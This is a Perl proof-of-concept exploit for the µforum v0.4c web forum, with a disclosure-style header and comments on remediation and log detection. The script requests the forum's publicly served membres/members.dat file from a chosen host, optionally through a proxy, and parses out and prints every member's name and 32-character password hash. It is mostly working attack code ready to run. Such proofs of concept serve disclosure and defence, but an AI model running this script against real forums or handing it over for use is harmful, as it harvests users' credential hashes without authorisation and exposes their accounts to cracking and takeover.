#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in a .dat file not protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use strict;
use warnings;

use Getopt::Long;
use HTTP::Request;
use LWP::UserAgent;

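# Proof of concept for the exposure described in the header: it requests
# <host><path>membres/members.dat over HTTP and prints each account name
# followed by the 32-character password hash stored next to it.
#
# What a hit means for the site owner: the data file is served as a static
# file, so any visitor can read every account name and password hash.
# The remedy is on the server side: keep the data file outside the document
# root or deny HTTP access to the membres/ directory, then treat every stored
# password as exposed and force a reset.
# Detection: GET requests for .../membres/members.dat in the web access log
# (this script sends the User-Agent string "Mozilla").

# Banner: a 38-column box around the title line.
my $rule = '+' . ('-' x 36) . "+\n";
print STDOUT "\n", $rule;
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT $rule;

# Command-line options:
#   --host   host name or base URL of the forum (required)
#   --path   path of the forum on that host, defaults to '/'
#   --proxh  HTTP proxy URL
#   --proxu  proxy user name
#   --proxp  proxy password
my ($host, $path, $proxh, $proxu, $proxp);
my $opt = GetOptions(
    'host=s'  => \$host,
    'path=s'  => \$path,
    'proxh=s' => \$proxh,
    'proxu=s' => \$proxu,
    'proxp=s' => \$proxp,
);

# The original ignored the GetOptions result and appended the path to an
# undefined $host; stop with a usage line instead of sending a malformed
# request.
if (!$opt || !defined $host || $host eq '') {
    print STDERR "Usage: $0 --host=<host> [--path=<path>] "
        . "[--proxh=<proxy-url>] [--proxu=<user> --proxp=<pass>]\n";
    exit(1);
}

$path = '/' if !$path;
my $url = $host . $path . 'membres/members.dat';

# Prepend a scheme only when none is present. The original tested /http/
# anywhere in the string, so a host or path that merely contained "http"
# was left without a scheme.
$url = 'http://' . $url if $url !~ m{\Ahttps?://}i;

my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $url);

# Basic proxy credentials need both halves; the original sent them whenever
# a password alone was given.
$req->proxy_authorization_basic($proxu, $proxp)
    if defined $proxu && defined $proxp;

my $res = $ua->request($req);

# A non-2xx answer (403, 404, ...) means the file is not being served, which
# is the state a correctly configured server should be in. Do not parse an
# error page as if it were member data.
if (!$res->is_success) {
    print STDERR "Request failed: ", $res->status_line, "\n";
    exit(1);
}

# The body is split on ':' and each piece is matched against two patterns.
# NOTE(review): the shapes `"...";a` and `"...";i` look like PHP serialize()
# output -- confirm against a members.dat from a test install.
for my $field (split /:/, $res->content) {

    # Quoted string followed by ';a' -- printed as the account name.
    print "\n", $1, '::' if $field =~ /"(.*)";a/;

    # 32 characters from [a-z0-9] followed by a literal ';i' (the 'i' is part
    # of the pattern, not a regex flag) -- printed as the password hash.
    # Presumably an MD5 hex digest; the page does not say.
    print $1 if $field =~ /"([a-z0-9]{32})";i/;
}

print "\n";
exit(0);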